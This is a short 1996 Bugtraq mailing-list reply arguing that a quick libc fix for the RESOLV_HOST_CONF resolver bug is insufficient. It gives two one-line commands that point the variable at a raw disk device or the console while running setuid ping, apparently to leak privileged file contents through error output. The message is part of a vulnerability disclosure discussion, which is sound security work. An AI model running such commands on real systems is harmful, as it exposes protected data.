[3232] in bugtraq
Re: libresolv+ bug
daemon@ATHENA.MIT.EDU (Nick Andrew)
Tue Aug 20 22:20:57 1996
Date: Wed, 21 Aug 1996 10:47:38 +1000
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
From: Nick Andrew <nick@zeta.org.au>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <2.2.32.19960820214107.0074ebb4@mail.actcom.co.il> from "Andi
Gutmans" at Aug 21, 96 00:41:07 am
Forwarding a message from Andi Gutmans:
> I temporarily fixed libc. I think the RESOLV_HOST_CONF thingy isn't
> insecure. I mean there's nothing really wrong with a user doing this. I just
> stopped the printf from printing the offending line. Yeah it's kind of cheap
> but I don't see a reason to do something better.
How about:
RESOLV_HOST_CONF=/dev/sda1 ping asdf
or
RESOLV_HOST_CONF=/dev/console ping asdf
Nick.
--
Kralizec Dialup Internet System Data: +61-2-9837-1183, 9837-1868
Zeta Microcomputer Software Fax: +61-2-9837-3753 Voice: 9837-1397
P.O. Box 177, Riverstone NSW 2765 http://www.kralizec.net.au/
